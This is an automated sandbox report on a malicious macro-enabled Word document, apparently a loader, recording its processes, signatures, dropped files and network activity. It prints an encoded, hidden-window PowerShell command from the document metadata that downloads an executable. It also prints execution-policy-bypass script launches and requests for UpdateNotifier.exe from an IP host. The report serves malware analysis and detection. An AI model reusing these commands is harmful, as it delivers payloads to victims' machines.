| File name: | Application-Form.docm |
| Full analysis: | https://app.any.run/tasks/ac6488ce-85f9-48ca-b9e4-84d9b9f8c208 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | January 08, 2025, 11:01:51 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| File info: | Microsoft Word 2007+ |
| MD5: | CD52BCE32A24F11B74C545E453835204 |
| SHA1: | 3DDAF0909FB2B8A50BE9FBD26A92CF45D89CD347 |
| SHA256: | 75C669AF5406116B5C2344B14FCB85B5CF7D6E4B3B7D3CDAE154638FB0D75AE6 |
| SSDEEP: | 24576:14y0Exg2NJ7hjN2uz2+ojPRwVDN4+QuxJkTnGcoiu9e0q:14y0Exg2NJ7hjN2uz2+ojpwVDN4+NxOF |
MALICIOUS
Accesses environment variables (SCRIPT)
- WINWORD.EXE (PID: 640)
Microsoft Office executes commands via PowerShell or Cmd
- WINWORD.EXE (PID: 640)
Run PowerShell with an invisible window
- powershell.exe (PID: 3808)
- powershell.exe (PID: 2728)
- powershell.exe (PID: 7156)
- powershell.exe (PID: 6208)
Bypass execution policy to execute commands
- powershell.exe (PID: 3808)
- powershell.exe (PID: 2728)
- powershell.exe (PID: 6208)
- powershell.exe (PID: 7156)
Starts POWERSHELL.EXE for commands execution
- WINWORD.EXE (PID: 640)
Unusual execution from MS Office
- WINWORD.EXE (PID: 640)
Changes powershell execution policy (Bypass)
- WINWORD.EXE (PID: 640)
Request from PowerShell that ran from MS Office
- powershell.exe (PID: 3808)
- powershell.exe (PID: 7156)
SUSPICIOUS
Creates FileSystem object to access computer's file system (SCRIPT)
- WINWORD.EXE (PID: 640)
Detected use of alternative data streams (AltDS)
- WINWORD.EXE (PID: 640)
Runs shell command (SCRIPT)
- WINWORD.EXE (PID: 640)
Writes binary data to a Stream object (SCRIPT)
- WINWORD.EXE (PID: 640)
The process executes Powershell scripts
- WINWORD.EXE (PID: 640)
Process requests binary or script from the Internet
- powershell.exe (PID: 7156)
- powershell.exe (PID: 3808)
Connects to the server without a host name
- powershell.exe (PID: 3808)
- powershell.exe (PID: 7156)
INFO
Manual execution by a user
- WINWORD.EXE (PID: 7108)
- WINWORD.EXE (PID: 640)
The process uses the downloaded file
- WINWORD.EXE (PID: 7108)
- WINWORD.EXE (PID: 640)
Drops encrypted VBS script (Microsoft Script Encoder)
- WINWORD.EXE (PID: 640)
Sends debugging messages
- WINWORD.EXE (PID: 640)
- powershell.exe (PID: 2728)
- powershell.exe (PID: 6208)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 3808)
- powershell.exe (PID: 7156)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 2728)
- powershell.exe (PID: 6208)
Reads Internet Explorer settings
- powershell.exe (PID: 3808)
Remote server returned an error (POWERSHELL)
- powershell.exe (PID: 3808)
- powershell.exe (PID: 7156)
Checks if a key exists in the options dictionary (POWERSHELL)
- powershell.exe (PID: 3808)
- powershell.exe (PID: 7156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
|---|---|---|
| .docx | | | Word Microsoft Office Open XML Format document (24.2) |
| .zip | | | Open Packaging Conventions container (18) |
| .zip | | | ZIP compressed archive (4.1) |
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0006 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 1980:01:01 00:00:00 |
| ZipCRC: | 0x3f450766 |
| ZipCompressedSize: | 399 |
| ZipUncompressedSize: | 1503 |
| ZipFileName: | [Content_Types].xml |
XML
| Template: | Normal |
|---|---|
| TotalEditTime: | 5.5 hours |
| Pages: | 1 |
| Words: | - |
| Characters: | 3 |
| Application: | Microsoft Office Word |
| DocSecurity: | None |
| Lines: | 1 |
| Paragraphs: | 1 |
| ScaleCrop: | No |
| HeadingPairs: |
|
| TitlesOfParts: | - |
| Company: | - |
| LinksUpToDate: | No |
| CharactersWithSpaces: | 3 |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| AppVersion: | 16 |
| Keywords: | - |
| LastModifiedBy: | Suzan Paulson |
| RevisionNumber: | 59 |
| CreateDate: | 2022:11:09 14:55:00Z |
| ModifyDate: | 2022:11:11 14:46:00Z |
XMP
| Title: | - |
|---|---|
| Subject: | - |
| Creator: | Suzan Paulson |
| Description: | powershell -Nop -noLogo -WindowStyle Hidden -ExecutionPolicy Unrestricted -EncodedCommand "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADEAMAAuADAALgAxADcALgA5AC8AYwBvAGwAbABlAGMAdABpAG8AbgBzAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYwBvAGwAbABlAGMAdABpAG8AbgBzAC4AZQB4AGUAIgAgAC0AUABhAHMAcwBUAGgAcgB1ACAAfAAgAG8AdQB0AC0AbgB1AGwAbAA7AA==" |
Total processes
146
Monitored processes
14
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 640 | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\Application-Form.docm" /o "" | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 16.0.16026.20146 Modules
| |||||||||||||||
| 2612 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2728 | powershell.exe -exec bypass -windowstyle hidden -c C:\Users\admin\AppData\Local\Microsoft\Windows\Global.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3808 | powershell.exe -exec bypass -windowstyle hidden -c C:\Users\admin\AppData\Local\Microsoft\Windows\Update.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5588 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5592 | "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "9F64AD20-067F-4DD8-B3B9-EDEE2D24FDC1" "042F06A2-9B32-463E-88A3-92C5CEAEF5B7" "640" | C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64. Version: 0.12.2.0 Modules
| |||||||||||||||
| 6208 | powershell.exe -exec bypass -windowstyle hidden -c C:\Users\admin\AppData\Local\Microsoft\Windows\Global.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6216 | "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "1C07D1BE-8626-477B-A82E-ECA49715A117" "D8ADA222-71BE-4F67-ACCC-51E8116A49B1" "7108" | C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64. Exit code: 0 Version: 0.12.2.0 Modules
| |||||||||||||||
| 6280 | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\Application-Form.docm.docx /o "" | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 16.0.16026.20146 Modules
| |||||||||||||||
| 6852 | "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "3DBF6404-910F-4C6E-920A-0CFB5E5F7EC9" "9431AEF4-1252-43BA-A853-EE378533AD9F" "6280" | C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64. Exit code: 0 Version: 0.12.2.0 Modules
| |||||||||||||||
Total events
54 345
Read events
54 124
Write events
179
Delete events
42
Modification events
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling |
| Operation: | write | Name: | 0 |
Value: 017012000000001000B24E9A3E02000000000000000600000000000000 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6280 |
| Operation: | write | Name: | 0 |
Value: 0B0E10563863BE77275446B51ACC20BCFBF80E230046AAC99BDFCBB7D8ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C5118831D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | en-US |
Value: 2 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | de-de |
Value: 2 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | fr-fr |
Value: 2 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | es-es |
Value: 2 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | it-it |
Value: 2 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ja-jp |
Value: 2 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | ko-kr |
Value: 2 | |||
| (PID) Process: | (6280) WINWORD.EXE | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages |
| Operation: | write | Name: | pt-br |
Value: 2 | |||
Executable files
1
Suspicious files
45
Text files
14
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Diagnostics\WINWORD\App1736334117596270100_BE633856-2777-4654-B51A-CC20BCFBF80E.log | — | |
MD5:— | SHA256:— | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S | binary | |
MD5:687BA0E5BB785B7A0AC33B97A0AAF400 | SHA256:4D9C05968441AF7A97EC55D40011A2E7DF5A6ACAF7E8F52DE9F06294581B096A | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\541A5771.tmp | binary | |
MD5:D8E89EE5429BC3343B723F59E9A04645 | SHA256:C4ACDC1AB12E3E108DE77FE929493E662BAA43AA58ED8FDE0122185412A8CDC9 | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | binary | |
MD5:E40754F065C9E63540A345F74677F5E4 | SHA256:D21B07974D96BC538C4DFD00420FC0C3AA97F7175D7D0026969DE6B78E7C9467 | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.json | binary | |
MD5:E4E83F8123E9740B8AA3C3DFA77C1C04 | SHA256:6034F27B0823B2A6A76FE296E851939FD05324D0AF9D55F249C79AF118B0EB31 | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres | binary | |
MD5:6820EF73D5F7A64D833344CBA8B9E8AD | SHA256:8DD93E1E31AFEE036826B16092FA06C7B1C427E2CCB877C417DEC5C316B69C71 | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\Features\6FeatureCache.txt | binary | |
MD5:D8E89EE5429BC3343B723F59E9A04645 | SHA256:C4ACDC1AB12E3E108DE77FE929493E662BAA43AA58ED8FDE0122185412A8CDC9 | |||
| 7108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Diagnostics\WINWORD\App1736334126349417700_ACC657A6-3C2F-4DBE-BECE-FB699A502E3C.log | — | |
MD5:— | SHA256:— | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres | binary | |
MD5:2A317733E45CD200D9A764DFDAD22923 | SHA256:1A022A379AB8BF053DEF0CA203B64EA5C619E3007627F08D8D16D87A23953C6C | |||
| 6280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json | binary | |
MD5:6CA4960355E4951C72AA5F6364E459D5 | SHA256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
74
DNS requests
27
Threats
6
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3808 | powershell.exe | GET | 404 | 11.0.87.230:80 | http://11.0.87.230/UpdateNotifier.exe | unknown | — | — | unknown |
7156 | powershell.exe | GET | 404 | 11.0.87.230:80 | http://11.0.87.230/UpdateNotifier.exe | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2040 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6280 | WINWORD.EXE | 52.109.76.240:443 | officeclient.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6280 | WINWORD.EXE | 52.113.194.132:443 | ecs.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
6280 | WINWORD.EXE | 23.50.131.74:443 | omex.cdn.office.net | Akamai International B.V. | DE | whitelisted |
3976 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6280 | WINWORD.EXE | 52.111.236.7:443 | messaging.lifecycle.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
officeclient.microsoft.com |
| whitelisted |
ecs.office.com |
| whitelisted |
omex.cdn.office.net |
| whitelisted |
messaging.lifecycle.office.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
login.live.com |
| whitelisted |
metadata.templates.cdn.office.net |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
3808 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
3808 | powershell.exe | Misc activity | ET INFO Request for EXE via Powershell |
3808 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
7156 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
7156 | powershell.exe | Misc activity | ET INFO Request for EXE via Powershell |
7156 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
Process | Message |
|---|---|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
powershell.exe | PID=2728 TID=6644 DISM API requires elevation - DismInitializeInternal(hr:0x800702e4)
|
powershell.exe | PID=2728 TID=6644 Leave DismInitializeInternal - DismInitializeInternal
|
powershell.exe | PID=6208 TID=3464 DISM API requires elevation - DismInitializeInternal(hr:0x800702e4)
|
powershell.exe | PID=6208 TID=3464 Leave DismInitializeInternal - DismInitializeInternal
|